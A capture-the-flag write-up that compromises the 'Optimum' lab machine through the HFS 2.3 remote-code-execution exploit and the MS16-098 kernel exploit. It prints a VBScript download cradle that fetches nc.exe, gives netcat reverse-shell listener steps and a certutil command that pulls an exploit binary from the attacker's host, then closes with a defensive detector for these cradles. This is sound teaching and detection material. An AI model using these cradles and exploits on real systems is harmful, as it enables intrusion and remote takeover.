This is a relatively easy machine; as the matrix shows, the attacks are mostly CVE-based.
nmap -A -p- -T4 -oN optimum -vvv 10.10.10.8
Http File Server 2.3
As shown in the web browser, the web service is hosted by HTTP File Server (HFS), a Windows program for serving files over HTTP; it is easy to set up and use without much effort on the user's end.
httpfileserver 2.3 exploit
A web search reveals that HttpFileServer 2.3 has a remote code execution exploit written in Python.
Reading the exploit code, it is clear that the Python script builds a VBScript with the following source:
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", "http://"+ip_addr+"/nc.exe", False
xHttp.Send
with bStrm
    .type = 1 '//binary
    .open
    .write xHttp.responseBody
    .savetofile "C:\Users\Public\nc.exe", 2 '//overwrite
end with
The script downloads nc.exe from the attacker's machine and saves it as C:\Users\Public\nc.exe. The exploit then executes the script and runs nc.exe to open a reverse TCP connection and spawn a cmd shell. The vulnerability in HFS 2.3 lies in its variable –
Get the user flag
I need to start a web server that hosts nc.exe, then in another terminal start an nc listener.
In the exploit code I change the IP address to my own tunnel IP address so that the exploit connects back to my nc listener.
python3 -m http.server 80
This command has to be executed in the directory containing nc.exe.
Then start my nc listener:
sudo nc -lvnp 443
Modify the IP address within the exploit code, then run it.
python 39161.py 10.10.10.8 80
The user flag is
Get the root
systeminfo shows the machine is running Windows Server 2012 R2 Standard, build 9600. A few kernel exploits are usable; I chose the kernel driver exploit MS16-098. Although it targets Windows 8.1, it works perfectly on Windows Server 2012 as well.
I download the compiled binary bfill.exe, then serve it over a web server so I can fetch it from Optimum.
On the Optimum machine I run:
certutil -f -urlcache http://10.10.14.27/bfill.exe c:\users\kostas\downloads\bfill.exe
Then run the exploit to get root.
the root flag is
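From the defender's side, both file drops in this writeup use well-known download cradles: the XMLHTTP plus ADODB.Stream pattern in the generated VBScript, and certutil's -urlcache fetch used to pull bfill.exe. The following is an added example, not part of the original writeup or the exploit, that scans process-creation command lines and script bodies for those two patterns and flags writes into commonly used staging directories. All records, names and the 192.0.2.10 address are constructed for the example.

```python
import re

# Patterns for the two download cradles seen in the writeup: certutil's URL
# cache fetch, and the XMLHTTP + ADODB.Stream + SaveToFile shape of the VBScript.
CERTUTIL_RE = re.compile(r"\bcertutil(?:\.exe)?\b.*?-urlcache\b.*?\bhttps?://", re.IGNORECASE)
XMLHTTP_RE = re.compile(r"(?:Microsoft|MSXML2)\.XMLHTTP", re.IGNORECASE)
ADODB_RE = re.compile(r"Adodb\.Stream", re.IGNORECASE)
SAVETOFILE_RE = re.compile(r"\.savetofile\b", re.IGNORECASE)
# World-writable or user-writable locations that are typical drop points
# (C:\Users\Public is the one the VBScript above writes to).
STAGING_RE = re.compile(r"C:\\Users\\Public\\|\\Downloads\\|\\AppData\\Local\\Temp\\", re.IGNORECASE)


def classify(text):
    """Return the list of findings for a single command line or script body."""
    findings = []
    if CERTUTIL_RE.search(text):
        findings.append("certutil-urlcache-download")
    # All three pieces must be present: fetch object, binary stream, and file write.
    if XMLHTTP_RE.search(text) and ADODB_RE.search(text) and SAVETOFILE_RE.search(text):
        findings.append("xmlhttp-adodb-stream-cradle")
    # Only report the staging directory when a cradle was found, to limit noise.
    if findings and STAGING_RE.search(text):
        findings.append("writes-to-staging-dir")
    return findings


def find_download_cradles(records):
    """records: iterable of (source, text). Returns [(source, findings)] for hits only."""
    hits = []
    for source, text in records:
        findings = classify(text)
        if findings:
            hits.append((source, findings))
    return hits


# Constructed sample records (not from the page): three process-creation
# command lines and two VBScript bodies, as a defender might collect them.
SAMPLE_RECORDS = [
    ("evt-1", r"certutil -f -urlcache http://192.0.2.10/tool.exe c:\users\alice\downloads\tool.exe"),
    ("evt-2", r"certutil -verify -urlfetch cert.cer"),  # legitimate certutil use, no -urlcache
    ("evt-3", r"C:\Windows\System32\svchost.exe -k netsvcs"),
    ("script-1",
     'dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")\n'
     'dim bStrm: Set bStrm = createobject("Adodb.Stream")\n'
     'xHttp.Open "GET", "http://192.0.2.10/nc.exe", False\n'
     'xHttp.Send\n'
     'with bStrm\n .type = 1\n .open\n .write xHttp.responseBody\n'
     ' .savetofile "C:\\Users\\Public\\nc.exe", 2\nend with'),
    # Fetches a page but never writes a file: XMLHTTP alone is not a cradle.
    ("script-2",
     'Set xHttp = CreateObject("Microsoft.XMLHTTP")\n'
     'xHttp.Open "GET", "http://intranet/status", False\n'
     'xHttp.Send\nWScript.Echo xHttp.responseText'),
]


if __name__ == "__main__":
    for source, findings in find_download_cradles(SAMPLE_RECORDS):
        print(f"{source}: {', '.join(findings)}")
```

Only evt-1 and script-1 are reported; the benign certutil invocation and the read-only XMLHTTP script produce no findings, which is the behaviour a practitioner would want before wiring this into process-creation or script-block logging.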